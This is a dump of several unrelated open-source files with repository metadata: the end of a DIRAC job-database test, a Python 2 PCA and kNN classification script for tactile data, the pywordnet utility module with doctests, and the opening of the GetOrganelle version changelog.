    assert res['Value'] == 'Job Rescheduled'
def test_getCounters():
    """Smoke test: counting jobs grouped by (Status, MinorStatus) since
    a fixed cutoff date must succeed."""
    res = jobDB.getCounters('Jobs', ['Status', 'MinorStatus'], {}, '2007-04-22 00:00:00')
    assert res['OK'] is True
| petricm/DIRAC | tests/Integration/WorkloadManagementSystem/Test_JobDB.py | Python | gpl-3.0 | 2,640 | [
"DIRAC"
] | a2b19376ccb2877b6f1f0b50ca8998c99be0da8450bcc2c73fd4154c1a018366 |
# Principal Component Analysis Code :
from numpy import mean,cov,double,cumsum,dot,linalg,array,rank,size,flipud
from pylab import *
import numpy as np
import matplotlib.pyplot as pp
#from enthought.mayavi import mlab
import scipy.ndimage as ni
import roslib; roslib.load_manifest('sandbox_tapo_darpa_m3')
import rospy
#import hrl_lib.mayavi2_util as mu
import hrl_lib.viz as hv
import hrl_lib.util as ut
import hrl_lib.matplotlib_util as mpu
import pickle
from mvpa.clfs.knn import kNN
from mvpa.datasets import Dataset
from mvpa.clfs.transerror import TransferError
from mvpa.misc.data_generators import normalFeatureDataset
from mvpa.algorithms.cvtranserror import CrossValidatedTransferError
from mvpa.datasets.splitters import NFoldSplitter
import sys
sys.path.insert(0, '/home/tapo/svn/robot1_data/usr/tapo/data_code/BMED_8813_HAP/Data')
from data import Fmat_original
def pca(X):
    """Principal component analysis via the covariance method (Python 2).

    Returns (eigenvectors, eigenvalues, per-row mean, centred data M,
    covariance matrix of M) for the input data matrix X.
    """
    #get dimensions
    num_data,dim = X.shape
    #center data
    mean_X = X.mean(axis=1)
    M = (X-mean_X) # subtract the mean (along columns)
    Mcov = cov(M)
    ###### Sanity Check: count NaN entries (x != x only for NaN) ######
    # NOTE(review): the 82x90 loop bounds are hard-coded for this
    # dataset's expected shape -- confirm they match X.shape.
    i=0
    n=0
    while i < 82:
        j=0
        while j < 90:
            if X[i,j] != X[i,j]:
                print X[i,j]
                print i,j
                n=n+1
            j = j+1
        i=i+1
    print n
    ##########################
    print 'PCA - COV-Method used'
    # Eigen-decomposition of the covariance matrix gives the principal
    # axes (vec) and the variance captured by each (val).
    val,vec = linalg.eig(Mcov)
    #return the projection matrix, the variance and the mean
    return vec,val,mean_X, M, Mcov
def my_mvpa(Y,num2):
    """Leave-one-chunk-out cross-validated kNN accuracy (in percent).

    `Y` holds 90 projected samples (3 regions x 6 objects x 5 trials);
    `num2` is the k used by the kNN classifier.
    """
    samples = np.array(Y)
    regions = ['Edge-1', 'Surface', 'Edge-2']
    objects = ['Can', 'Book', 'Brown-Cardboard-Box', 'Cinder-Block',
               'Tin-Box', 'White-Cardboard-Box']
    # 30 samples per region; chunks identify each object/region block of 5.
    labels = [region for region in regions for _ in range(30)]
    chunks = [obj + '-' + region
              for region in regions for obj in objects for _ in range(5)]
    classifier = kNN(k=num2)
    transfer_error = TransferError(classifier)
    dataset = Dataset(samples=samples, labels=labels, chunks=chunks)
    cross_validator = CrossValidatedTransferError(transfer_error,
                                                  NFoldSplitter(cvtype=1),
                                                  enable_states=['confusion'])
    error = cross_validator(dataset)
    # Convert the error rate to an accuracy percentage.
    return (1 - error) * 100
def result(eigvec_total, eigval_total, mean_data_total, B, C, num_PC):
    """Project the centred data ``B`` onto the first ``num_PC``
    eigenvectors and return the projected samples (one row per sample).

    Only ``eigvec_total``, ``B`` and ``num_PC`` are used; the remaining
    parameters are kept for interface compatibility with the caller.
    """
    # Reduced eigenvector matrix: keep the leading num_PC columns.
    W = eigvec_total[:, :num_PC]
    # '*' is a matrix product for np.matrix operands (elementwise for
    # plain ndarrays) -- behaviour follows the caller's input type.
    projection = (W.T) * B
    return projection.T
if __name__ == '__main__':

    # Rows 41..122 of the raw feature matrix (this experiment's subset).
    Fmat = Fmat_original[41:123,:]

    # Checking the Data-Matrix
    m_tot, n_tot = np.shape(Fmat)
    print 'Total_Matrix_Shape:',m_tot,n_tot
    eigvec_total, eigval_total, mean_data_total, B, C = pca(Fmat)
    #print eigvec_total
    #print eigval_total
    #print mean_data_total
    m_eigval_total, n_eigval_total = np.shape(np.matrix(eigval_total))
    m_eigvec_total, n_eigvec_total = np.shape(eigvec_total)
    m_mean_data_total, n_mean_data_total = np.shape(np.matrix(mean_data_total))
    print 'Eigenvalue Shape:',m_eigval_total, n_eigval_total
    print 'Eigenvector Shape:',m_eigvec_total, n_eigvec_total
    print 'Mean-Data Shape:',m_mean_data_total, n_mean_data_total

    #Recall that the cumulative sum of the eigenvalues shows the level of variance accounted by each of the corresponding eigenvectors. On the x axis there is the number of eigenvalues used.
    perc_total = cumsum(eigval_total)/sum(eigval_total)

    # Sweep the number of principal components (1..20); for each, sweep
    # k of the kNN classifier (0..20) and plot CV accuracy vs k.
    num_PC=1
    while num_PC <=20:
        Proj = np.zeros((90,num_PC))
        Proj = result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC)
        # PYMVPA:
        # NOTE(review): the inner loop starts at num=0, i.e. kNN(k=0) --
        # confirm that is a valid k for the mvpa kNN implementation.
        num=0
        cv_acc = np.zeros(21)
        while num <=20:
            cv_acc[num] = my_mvpa(Proj,num)
            num = num+1
        plot(np.arange(21),cv_acc,'-s')
        grid('True')
        hold('True')
        num_PC = num_PC+1
    legend(('1-PC', '2-PCs', '3-PCs', '4-PCs', '5-PCs', '6-PCs', '7-PCs', '8-PCs', '9-PCs', '10-PCs', '11-PC', '12-PCs', '13-PCs', '14-PCs', '15-PCs', '16-PCs', '17-PCs', '18-PCs', '19-PCs', '20-PCs'))
    ylabel('Cross-Validation Accuracy')
    xlabel('k in k-NN Classifier')
    show()
| tapomayukh/projects_in_python | sandbox_tapo/src/skin_related/BMED_8813_HAP/Features/multiple_features/best_kNN_PC/cross_validate_categories_kNN_PC_BMED_8813_HAP_scaled_method_II_area_force.py | Python | mit | 4,444 | [
"Mayavi"
] | 9392fb83504fac97e6d320223066d699570659222da5d174f53bc1249b0d5cc7 |
# Module wordnet.py
#
# Original author: Oliver Steele <steele@osteele.com>
# Project Page: http://sourceforge.net/projects/pywordnet
#
# Copyright (c) 1998-2004 by Oliver Steele. Use is permitted under
# the Artistic License
# <http://www.opensource.org/licenses/artistic-license.html>
"""Utility functions to use with the wordnet module.
Usage
-----
>>> dog = N['dog'][0]
# (First 10) adjectives that are transitively SIMILAR to the main sense of 'red'
>>> closure(ADJ['red'][0], SIMILAR)[:10]
['red' in {adjective: red, reddish, ruddy, blood-red, carmine, cerise, cherry, cherry-red, crimson, ruby, ruby-red, scarlet}, {adjective: chromatic}, {adjective: amber, brownish-yellow, yellow-brown}, {adjective: amethyst}, {adjective: aureate, gilded, gilt, gold, golden}, {adjective: azure, cerulean, sky-blue, bright blue}, {adjective: blue, bluish, blueish, light-blue, dark-blue, blue-black}, {adjective: bluish green, blue-green, cyan, teal}, {adjective: blushful, rosy}, {adjective: bottle-green}]
>>> # Adjectives that are transitively SIMILAR to any of the senses of 'red'
>>> #flatten1(map(lambda sense:closure(sense, SIMILAR), ADJ['red'])) # too verbose
>>> # Hyponyms of the main sense of 'dog'(n.) that are homophonous with verbs
>>> filter(lambda sense:V.get(sense.form), flatten1(map(lambda e:e.getSenses(), hyponyms(N['dog'][0]))))
['dog' in {noun: dog, domestic dog, Canis familiaris}, 'pooch' in {noun: pooch, doggie, doggy, barker, bow-wow}, 'toy' in {noun: toy dog, toy}, 'hound' in {noun: hound, hound dog}, 'basset' in {noun: basset, basset hound}, 'cocker' in {noun: cocker spaniel, English cocker spaniel, cocker}, 'bulldog' in {noun: bulldog, English bulldog}]
>>> # Find the senses of 'raise'(v.) and 'lower'(v.) that are antonyms
>>> filter(lambda p:p[0] in p[1].pointerTargets(ANTONYM), product(V['raise'].getSenses(), V['lower'].getSenses()))
[('raise' in {verb: raise, lift, elevate, get up, bring up}, 'lower' in {verb: lower, take down, let down, get down, bring down})]
"""
__author__ = "Oliver Steele <steele@osteele.com>"
__version__ = "2.0"
from wordnet import *
#
# Domain utilities
#
def _requireSource(entity):
    # Internal guard: `entity` must expose a `pointers` attribute, i.e.
    # be a Sense or Synset.  A Word gets a hint to index into its senses.
    # (Python 2 syntax: comma-form raise and backtick repr.)
    if not hasattr(entity, 'pointers'):
        if isinstance(entity, Word):
            raise TypeError, `entity` + " is not a Sense or Synset. Try " + `entity` + "[0] instead."
        else:
            raise TypeError, `entity` + " is not a Sense or Synset"
def tree(source, pointerType):
    """Return the nested-list tree rooted at `source` under the
    `pointerType` relation: [source, subtree-of-target-1, ...].
    For a Word, return one tree per sense.

    >>> dog = N['dog'][0]
    >>> from pprint import pprint
    >>> pprint(tree(dog, HYPERNYM))
    ['dog' in {noun: dog, domestic dog, Canis familiaris},
     [{noun: canine, canid},
      [{noun: carnivore},
       [{noun: placental, placental mammal, eutherian, eutherian mammal},
        [{noun: mammal},
         [{noun: vertebrate, craniate},
          [{noun: chordate},
           [{noun: animal, animate being, beast, brute, creature, fauna},
            [{noun: organism, being},
             [{noun: living thing, animate thing},
              [{noun: object, physical object}, [{noun: entity}]]]]]]]]]]]]
    >>> #pprint(tree(dog, HYPONYM)) # too verbose to include here
    """
    if isinstance(source, Word):
        # One subtree per sense (Python 2: map() returns a list here).
        return map(lambda s, t=pointerType:tree(s,t), source.getSenses())
    _requireSource(source)
    # Node itself followed by the recursively expanded pointer targets.
    return [source] + map(lambda s, t=pointerType:tree(s,t), source.pointerTargets(pointerType))
def closure(source, pointerType, accumulator=None):
    """Return the transitive closure of source under the pointerType
    relationship. If source is a Word, return the union of the
    closures of its senses.

    >>> dog = N['dog'][0]
    >>> closure(dog, HYPERNYM)
    ['dog' in {noun: dog, domestic dog, Canis familiaris}, {noun: canine, canid}, {noun: carnivore}, {noun: placental, placental mammal, eutherian, eutherian mammal}, {noun: mammal}, {noun: vertebrate, craniate}, {noun: chordate}, {noun: animal, animate being, beast, brute, creature, fauna}, {noun: organism, being}, {noun: living thing, animate thing}, {noun: object, physical object}, {noun: entity}]
    """
    if isinstance(source, Word):
        # NOTE(review): the docstring promises the union of the *closures*
        # of the senses, but this calls tree() (nested lists) -- looks
        # inconsistent; confirm whether closure() was intended here.
        return reduce(union, map(lambda s, t=pointerType:tree(s,t), source.getSenses()))
    _requireSource(source)
    if accumulator is None:
        accumulator = []
    # Depth-first accumulation; the membership test prevents revisiting
    # nodes when the relation graph contains shared ancestors.
    if source not in accumulator:
        accumulator.append(source)
        for target in source.pointerTargets(pointerType):
            closure(target, pointerType, accumulator)
    return accumulator
def hyponyms(source):
    """Return source and its transitive hyponyms (more specific terms).
    If source is a Word, return the union of the hyponyms of its
    senses."""
    return closure(source, HYPONYM)
def hypernyms(source):
    """Return source and its transitive hypernyms (more general terms).
    If source is a Word, return the union of the hypernyms of its
    senses."""
    return closure(source, HYPERNYM)
def meet(a, b, pointerType=HYPERNYM):
    """Return the first common element of the closures of a and b under
    pointerType (their meet), or None if the closures are disjoint.

    >>> meet(N['dog'][0], N['cat'][0])
    {noun: carnivore}
    >>> meet(N['dog'][0], N['person'][0])
    {noun: organism, being}
    >>> meet(N['thought'][0], N['belief'][0])
    {noun: content, cognitive content, mental object}
    """
    common = intersection(closure(a, pointerType), closure(b, pointerType))
    if common:
        return common[0]
    return None
#
# String Utility Functions
#
def startsWith(str, prefix):
    """Return True iff `str` starts with `prefix`.

    >>> startsWith('unclear', 'un')
    True
    """
    # Delegate to the builtin method, which also handles an empty prefix
    # and avoids the manual slice comparison.
    return str.startswith(prefix)
def endsWith(str, suffix):
    """Return True iff `str` ends with `suffix`.

    >>> endsWith('clearly', 'ly')
    True
    """
    # Bug fix: the old slicing test `str[-len(suffix):] == suffix`
    # returned False for an empty suffix, because str[-0:] is the whole
    # string.  str.endswith('') is correctly True.
    return str.endswith(suffix)
def equalsIgnoreCase(a, b):
    """Return True iff a and b have the same lowercase representation.

    >>> equalsIgnoreCase('dog', 'Dog')
    True
    >>> equalsIgnoreCase('dOg', 'DOG')
    True
    """
    # Fast path when they are already equal; otherwise compare the
    # lowercased forms via the str method instead of the long-deprecated
    # `string` module functions.
    return a == b or a.lower() == b.lower()
#
# Sequence Utility Functions
#
def issequence(item):
    """Return true iff _item_ is a Sequence (a List, String, or Tuple).

    >>> issequence((1,2))
    1
    >>> issequence([1,2])
    1
    >>> issequence('12')
    1
    >>> issequence(1)
    0
    """
    # Python 2 `types` module names; note StringType is `str` only, so a
    # unicode object is NOT treated as a sequence here -- presumably
    # deliberate for this module, but verify before changing.
    return type(item) in (ListType, StringType, TupleType)
def intersection(u, v):
    """Return the elements of u that also occur in v, preserving u's
    order (duplicates in u are kept).

    >>> intersection((1,2,3), (2,3,4))
    [2, 3]
    """
    return [item for item in u if item in v]
def union(u, v):
    """Return a list of u's elements followed by those of v that are not
    already present (order-preserving union).

    >>> union((1,2,3), (2,3,4))
    [1, 2, 3, 4]
    """
    # list(u) always builds a fresh list, so the old `if w is u:` copy
    # branch was unreachable dead code and has been removed.
    w = list(u)
    for e in v:
        if e not in w:
            w.append(e)
    return w
def product(u, v):
    """Return the Cartesian product of u and v as a flat list of pairs,
    iterating u in the outer position.

    >>> product("12", "ab")
    [('1', 'a'), ('1', 'b'), ('2', 'a'), ('2', 'b')]
    """
    return [(a, b) for a in u for b in v]
def removeDuplicates(sequence):
    """Return sequence's items as a list with later duplicates dropped,
    keeping first-occurrence order.  Uses ==-based membership (not
    hashing), so unhashable items are supported.

    >>> removeDuplicates("this is a test")
    ['t', 'h', 'i', 's', ' ', 'a', 'e']
    """
    seen = []
    for element in sequence:
        if element not in seen:
            seen.append(element)
    return seen
#
# Tree Utility Functions
#
def flatten1(sequence):
    """Flatten one level of nesting: items that are exactly a list or a
    tuple are spliced into the result; everything else is appended
    unchanged."""
    flat = []
    for element in sequence:
        if type(element) in (tuple, list):
            flat.extend(element)
        else:
            flat.append(element)
    return flat
#
# WordNet utilities
#
GET_INDEX_SUBSTITUTIONS = ((' ', '-'), ('-', ' '), ('-', ''), (' ', ''), ('.', ''))
def getIndex(form, pos='noun'):
    """Search for _form_ in the index file corresponding to
    _pos_.  getIndex applies to _form_ an algorithm that replaces
    underscores with hyphens, hyphens with underscores, removes
    hyphens and underscores, and removes periods in an attempt to find
    a form of the string that is an exact match for an entry in the
    index file corresponding to _pos_.  getWord() is called on each
    transformed string until a match is found or all the different
    strings have been tried.  It returns a Word or None."""
    def trySubstitutions(trySubstitutions, form, substitutions, lookup=1, dictionary=dictionaryFor(pos)):
        # Default arg binds the dictionary once per getIndex() call.
        if lookup and dictionary.has_key(form):
            return dictionary[form]
        elif substitutions:
            (old, new) = substitutions[0]
            # BUG(review): `substitute` is referenced before assignment on
            # this right-hand side (NameError when this branch runs);
            # presumably the intent was `substitute = string.replace(form,
            # old, new)` plus a separate `substitute != form` check --
            # confirm against the upstream pywordnet source before fixing.
            substitute = string.replace(form, old, new) and substitute != form
            if substitute and dictionary.has_key(substitute):
                return dictionary[substitute]
            return trySubstitutions(trySubstitutions, form, substitutions[1:], lookup=0) or \
                   (substitute and trySubstitutions(trySubstitutions, substitute, substitutions[1:]))
    # NOTE(review): `returnMatch` is not defined anywhere in this module;
    # `trySubstitutions` itself is probably the intended first argument.
    return trySubstitutions(returnMatch, form, GET_INDEX_SUBSTITUTIONS)
MORPHOLOGICAL_SUBSTITUTIONS = {
NOUN:
[('s', ''),
('ses', 's'),
('ves', 'f'),
('xes', 'x'),
('zes', 'z'),
('ches', 'ch'),
('shes', 'sh'),
('men', 'man'),
('ies', 'y')],
VERB:
[('s', ''),
('ies', 'y'),
('es', 'e'),
('es', ''),
('ed', 'e'),
('ed', ''),
('ing', 'e'),
('ing', '')],
ADJECTIVE:
[('er', ''),
('est', ''),
('er', 'e'),
('est', 'e')],
ADVERB: []}
def morphy(form, pos='noun', collect=0):
    """Recursively uninflect _form_, and return the first form found
    in the dictionary. If _collect_ is true, a sequence of all forms
    is returned, instead of just the first one.

    >>> morphy('dogs')
    'dog'
    >>> morphy('churches')
    'church'
    >>> morphy('aardwolves')
    'aardwolf'
    >>> morphy('abaci')
    'abacus'
    >>> morphy('hardrock', 'adv')
    """
    from wordnet import _normalizePOS, _dictionaryFor
    pos = _normalizePOS(pos)
    # Exception file holding irregular inflections for this POS.
    fname = os.path.join(WNSEARCHDIR, {NOUN: 'noun', VERB: 'verb', ADJECTIVE: 'adj', ADVERB: 'adv'}[pos] + '.exc')
    excfile = open(fname)
    substitutions = MORPHOLOGICAL_SUBSTITUTIONS[pos]
    def trySubstitutions(trySubstitutions, # workaround for lack of nested closures in Python < 2.1
                         form, # reduced form
                         substitutions, # remaining substitutions
                         lookup=1,
                         dictionary=_dictionaryFor(pos),
                         excfile=excfile,
                         collect=collect,
                         collection=[]):
        # NOTE(review): `collection=[]` is a mutable default shared across
        # calls with collect=1 -- confirm the accumulation is intended.
        import string
        #exceptions = binarySearchFile(excfile, form)
        # Linear scan of the exception file for an irregular base form.
        # NOTE(review): the file is consumed by readlines() and never
        # rewound, so recursive calls see an exhausted file -- verify.
        for line in excfile.readlines():
            if form == line.split()[0]:
                form = line.split()[1]
##        if exceptions:
##            form = exceptions[string.find(exceptions, ' ')+1:-1]
        #print dictionary.keys()
        if lookup and dictionary.has_key(form):
            if collect:
                collection.append(form)
            else:
                return form
        elif substitutions:
            # Strip the first suffix rule and recurse on the remainder,
            # both with and without the substitution applied.
            old, new = substitutions[0]
            substitutions = substitutions[1:]
            substitute = None
            if endsWith(form, old):
                substitute = form[:-len(old)] + new
            #if dictionary.has_key(substitute):
            #    return substitute
            form = trySubstitutions(trySubstitutions, form, substitutions) or \
                   (substitute and trySubstitutions(trySubstitutions, substitute, substitutions))
            return (collect and collection) or form
        elif collect:
            return collection
    return trySubstitutions(trySubstitutions, form, substitutions)
#
# Testing
#
def _test(reset=0):
    """Run this module's doctests.  Pass reset=1 after a reload() so
    doctest does not complain about re-registered tests."""
    import doctest, wntools
    if reset:
        doctest.master = None # This keeps doctest from complaining after a reload.
    return doctest.testmod(wntools)
| PennNLP/SLURP | semantics/wntools.py | Python | gpl-3.0 | 12,392 | [
"Amber"
] | f8534cdff38ef2721093e07f4e5e63e92773dde8252b28c3acd32894975b27b5 |
def get_versions():
    """Return the version string of the latest (first-listed) release."""
    latest_release = versions[0]
    return latest_release["number"]
versions = [
{
"number": "1.7.5.3",
"features": [
"1. get_organelle_from_reads.py: fix a bug when no qualified reads found (issue 123)",
"2. get_organelle_from_reads.py: pass --spades-options to pre-assembly for Mac M1 (issue 127)",
"3. get_organelle_from_reads.py:slim_spades_result: avoid ValueError",
"4. Update README.md: input read qc; issues->discussions",
],
"time": "2022-01-21 11:20 UTC-5"
},
{
"number": "1.7.5.2",
"features": [
"1. ask the questions publicly",
"2. statistical_func.py: weighted_gmm_with_em_aic(): fix a bug that will be triggered by "
" graph produced by join_spades_fastg_by_blast.py (reported by Mergi Dinka); "
" also fix a hidden mis-indexing issue there",
"3. Utilities/join_spades_fastg_by_blast.py: update on a v name issue "
" (issues 119)",
],
"time": "2021-12-15 02:35 UTC-5"
},
{
"number": "1.7.5.1",
"features": [
"1. make_batch_for_get_organelle.py: usage updated (reported by Fei Zhao@KIB)",
"2. space in the output path should be forbidden (reported by Manuela Sann@UFreiburg)",
],
"time": "2021-05-13 16:50 UTC+8"
},
{
"number": "1.7.5",
"features": [
"1. assembly_parser.py: fix a bug in estimation of the multiplicity of self-loop vertex, "
" which was falsely forced to be at least 2. (detected in a case of Yan Zhong@SCNU)",
"2. get_organelle_from_reads.py: typo in instruction for --max-extending-len corrected",
"3. redundant Assembly.merging_history() removed",
"4. fix a small bug in Assembly.is_sequential_repeat(), "
" isolate path_without_leakage as find_pair_closing_the_path",
"5. get_organelle_from_reads.py: fix an inconformity between the document and the default for -R, ",
"6. pipe_control_func.py: detect bowtie2 version improved",
],
"time": "2021-05-13 16:50 UTC+8"
},
{
"number": "1.7.4.1",
"features": [
"1. get_organelle_config.py: provide guidance for old code and new database incompatibility "
" (reported by Wenxiang Liu@SWFU)",
"2. assembly_parser.py: fix a bug after scaffolding with SPAdes path "
" (introduced in 1.7.4 feature 5; reported by Robin van Velzen@WUR)",
"3. update README.md with improved instruction",
],
"time": "2021-04-16 14:46 UTC+8"
},
{
"number": "1.7.4",
"features": [
"1. SequenceList: self.__indexed updated",
"2. get_static_html_context: requests.exceptions.ReadTimeout added"
"3. get_organelle_from_reads.py: '--overwrite' added; catch shutil.rmtree() errors; no python-lib -> error."
"4. get_organelle_from_*.py: turning off bandage if the result is not circular",
"5. assembly_parser.py: recording every overlap value rather than using a universal value for hifiasm "
" (in response to Christopher Benson@PSU)",
"6. optparse -> argparse (in response to Matthias Bernt@UFZ)",
"7. get_organelle_from_assembly.py: fix a bug with the malfunction of --continue when the input is gfa ",
"8. get_organelle_from_reads.py/disentangle_organelle_assembly.py: correct typos",
"9. pipe_control_func.py: map_with_bowtie2: warn reads integrity; build_bowtie2_db: rm small index",
"10. get_organelle_config.py: verbose log for bowtie2 and blast",
"11. update README.md with a reframed instruction",
],
"time": "2021-04-14 17:52 UTC+8"
},
{
"number": "1.7.4-pre2",
"features": [
"1. README.md: updated",
"2. partial fix: subprocess may 'fail' if error was in the directory name due to detecting error from log",
"3. scaffolding failures: try except AssertError to skip abnormal SPAdes paths (reported by Jinjing Jian@FDU)",
],
"time": "2021-03-04 23:55 UTC+8"
},
{
"number": "1.7.4-pre",
"features": [
"1. setup.py: modify scripts with utf-8",
"2. filtered -> extended, to clarify the process",
"3. get_organelle_from_reads.py: fix illustration of --which-blast, --which-bowtie2, --which-spades",
"4. fix a bug of pre_assembly_mapped_reads_for_base_cov introduced in 1.7.3.5b",
],
"time": "2021-02-26 11:30 UTC+8"
},
{
"number": "1.7.3.5b",
"features": [
"1. pipe_control_func: executable modified",
"2. realtime monitoring SPAdes log (solving the stuck in the segmentation fault)",
],
"time": "2021-02-24 18:11 UTC+8"
},
{
"number": "1.7.3.5a",
"features": [
"1. setup.py: fix a bug of codec for in-situ installation: invalid attempt to modify ._*py files",
"2. setup.py: fix a bug introduced by 1.7.3 while relocating GetOrganelle databases",
],
"time": "2021-02-24 12:30 UTC+8"
},
{
"number": "1.7.3.5",
"features": [
"1. README.md updated with embplant_mt notes",
"2. remove invalid --genes file check",
],
"time": "2021-02-23 01:11 UTC+8"
},
{
"number": "1.7.3.4",
"features": [
"1. fix bugs with '--config-dir'",
"2. customized databases (--genes/--ex-genes) passed to slim during pre-assembly & depth estimation",
"3. fix a bug with get_graph_coverages_range_simple() when no contigs received"
],
"time": "2021-02-18 19:00 UTC+8"
},
{
"number": "1.7.3.4-pre",
"features": [
"1. fix bugs with '--config-dir'",
"2. customized databases (--genes/--ex-genes) passed to slim during pre-assembly & depth estimation",
],
"time": "2021-02-12 02:00 UTC+8"
},
{
"number": "1.7.3.3",
"features": [
"1. early termination on invalid path characters for spades",
"2. fix a bug introduced by '--max-reads inf'",
"3. get_organelle_config.py: fix a bug if a new organelle types was added and '--use-local' was used",
],
"time": "2021-02-11 01:00 UTC+8"
},
{
"number": "1.7.3.2",
"features": [
"1. improve support for standard gfa format: E/L with optional fields",
],
"time": "2021-02-03 13:30 UTC+8"
},
{
"number": "1.7.3.1",
"features": [
"1. bug fixed: a bug of sorting consensus vertex names using smart_trans_for_sort",
"2. option --max-reads inf configured",
],
"time": "2021-01-25 13:00 UTC+8"
},
{
"number": "1.7.3",
"features": [
"1. fungus_nr added",
"2. relocate default GetOrganelle databases using GETORG_PATH",
"3. log platform info",
],
"time": "2021-01-20 12:30 UTC+8"
},
{
"number": "1.7.2b",
"features": [
"1. --reverse-lsc malfunction issue solved",
],
"time": "2020-12-19 14:00 UTC+8"
},
{
"number": "1.7.2a",
"features": [
"1. slim_graph.py: --evalue added",
"2. trans_word_cov: using log() to avoid large int converting",
"3. get_organelle_from_reads.py: add url to FAQ for incomplete result",
],
"time": "2020-12-16 23:50 UTC+8"
},
{
"number": "1.7.2",
"features": [
"1. assembly_parser.py: fix bugs in scaffolding",
],
"time": "2020-12-10 23:50 UTC+8"
},
{
"number": "1.7.2beta2",
"features": [
"1. get_organelle_from_reads.py: fix a bug in parsing options",
],
"time": "2020-12-09 UTC+8"
},
{
"number": "1.7.2beta",
"features": [
"1. slim_graph.py: fix a bug in parsing options (reported by Fei Zhao @ KIB)",
"2. automatically adding --phred-offset to avoid hammer failures",
"3. MergingHistory and ConsensusHistory added, in replace of using the names to detect merging history",
"4. Compatible with flye gfa format",
"5. Scaffolding function bug fixed & improved",
"6. get_organelle_config.py: example typo fixed",
],
"time": "2020-12-03 UTC+8"
},
{
"number": "1.7.1a",
"features": [
"output index bug fixed",
],
"time": "2020-07-28 01:30 UTC+8"
},
{
"number": "1.7.1",
"features": [
"get_organelle_from_assembly.py: do not convert gfa to fastg; ",
"Assembly.get_all_circular_paths(): optimized for plastome order",
"Assembly.reduce_to_subgraph: limit_offset_current_vertex -> bait_offsets; safer slim_graph.py performance",
"Assembly.get_all*_paths(): more detailed log info",
],
"time": "2020-07-25 02:50 UTC+8"
},
{
"number": "1.7.0c",
"features": [
"Utilities/slim_graph.py: fix a bug with anonym mode",
"README.md: updated"
],
"time": "2020-07-21 10:55 UTC+8"
},
{
"number": "1.7.0b",
"features": [
"1. get_organelle_from_reads.py: "
" 1) --ignore-k work for small k disentanglement "
" 2) fix a bug when input reads are very few ",
"2. better log info",
],
"time": "2020-07-08 22:30 UTC+8"
},
{
"number": "1.7.0",
"features": [
"1. get_organelle_from*.py: reorganize some importing code, fix minor issues",
"2. get_organelle_from_reads.py: rm output/seed/embplant_pt.initial.fq.spades by default",
],
"time": "2020-06-28 00:00 UTC+8"
},
{
"number": "1.7.0-beta7",
"features": [
"1. get_organelle_from_reads.py: "
" 1) fix option --max-extending-len typo "
" 2) --disentangle-time-limit 600 => 1800"
" 3) fix parameter estimation, pre-assembly minor bug",
"2. get_organelle_from_assembly.py: echo scaffolding.",
"3. assembly_parser.Assembly: "
" 1) --keep-temp generate more intermediate results "
" 2) Vertex: connections[end]: set() -> OrderedDict() "
" 3) fix a bug of multiplicity estimation on assembly graph with self-loop contigs",
"4. assembly_parser.SPAdesScaffolds: improved with more situations",
"5. README.md: updated",
],
"time": "2020-06-26 03:00 GMT-6"},
{
"number": "1.7.0-beta6",
"features": [
"1. get_organelle_from_reads.py: make pre-assembly and --ignore-k work for small read length",
],
"time": "2020-06-07 01:40 GMT-6"},
{
"number": "1.7.0-beta5",
"features": [
"1. get_organelle_config.py: alternative repository (gitee.com/jinjianjun/GetOrganelleDB) added",
"2. setup.py: dependent python lib requests added",
],
"time": "2020-05-28 18:40 GMT-6"},
{"number": "1.7.0-beta4",
"features": [
"1. Utilities/slim_fastg -> Utilities/slim_graph: 1) reorganized; 2) added support for gfa format graph file;"
"3) --max-slim-extending-len added",
"2. get_organelle_config.py added with *Database removed",
"3. get_organelle_from_reads.py: "
"1) use SPAdes generated scaffolds.paths to create gap containing scaffolds (assembly_parser.py)"
"2) rm --gradient-k "
"3) output fasta name modified"
"4) log Database version",
"4. get_organelle_from_assembly.py: "
"1) use SPAdes generated scaffolds.paths to create gap containing scaffolds (assembly_parser.py)"
"2) output fasta name modified"
"3) log Database version",
"5. assembly_parser.py: 1) merge_all_possible_vertices: fix a bug for overlap=0; 2) reduce_to_subgraph added; "
"3) processing_polymorphism: fix a bug; "
"4) class SPAdesScaffolds: use SPAdes generated scaffolds.paths to create gap containing scaffolds",
"6. Utilities/reconstruct_graph_from_fasta.py: fix a bug",
"7. Bandage generate temp file",
"8. README.md: updated",
],
"time": "2020-05-26 21:00 GMT-6"},
{"number": "1.6.4",
"features": [
"1. log plastome structure",
"2. --max-paths-num added for get_organelle*.py & disentangle*.py",
"3. reorganize codes: class SimpleAssembly & detect_plastome_architecture()",
"4. evaluate_assembly_using_mapping.py: --stat-mode, --bowtie2-options, --plot-font added",
"5. isolate GetOrganelleDep again",
"6. README.md: updated with conda installation",
],
"time": "2020-02-27 17:14 GMT-6"},
{"number": "1.6.3a",
"features": [
"1. Minor bugs fixes",
],
"time": "2020-02-27 17:14 GMT-6"},
{"number": "1.6.3-beta",
"features": [
"1. get_organelle_from_assembly.py & disentangle_organelle_assembly.py: --max-multiplicity added",
"2. Assembly.estimate_copy_and_depth_precisely() modified: constraint_max_function() for --max-multiplicity",
"3. Assembly.tag_in_between() modified",
"4. Assembly.estimate_copy_and_depth_by_cov() modified: min average coverage limit",
"5. Assembly.processing_polymorphism():"
" fix a bug when kmer-len repeats shared by two contigs; fix a bug that cause RuntimeError",
"6. Assembly: too many results due to palindromic repeats, problem solved",
"7. Utilities/reconstruct_graph_from_fasta.py & NaiveKmerNodeGraph added",
"8. Utilities/gfa_to_fasta.py, Utilities/fastg_to_gfa.py: description corrected",
"9. Assembly.parse_gfa(): compatibility increased",
"10. Utilities/gfa2fastg.py: compatibility increased",
"11. Assembly.estimate_copy_and_depth_precisely(): fix a bug on a rare case that multiplicities res are 4,8,4",
"12. README.md: updated",
],
"time": "2020-02-22 02:40 GMT-6"},
{"number": "1.6.2e",
"features": [
"1. seq_parser.py: fix a bug for fastq format: @*****#/1",
"2. get_organelle_from_reads.py: separate_fq_by_pair(), fix a bug when detecting pair info failed; ",
"3. evaluate_assembly_using_mapping.py: fix a bug for --plot-transparent",
"4. GetOrganelleLib.__init__.py: __version__",
"5. README.md: updated",
]},
{"number": "1.6.2d",
"features": [
"1. get_organelle_from_reads.py: fix a bug with '-F anonym'",
]},
{"number": "1.6.2c",
"features": [
"1. GetOrganelleLib/assembly_parser.py: SSC direction set according to orf",
"2. disentangle: --reverse-lsc option added; fix a bug for disentangling contigs with no overlaps",
"3. Utilities/plastome_arch_info.py: GC content added",
"4. get_organelle_from_reads.py: fix a bug for --flush-step inf"
]},
{"number": "1.6.2b",
"features": [
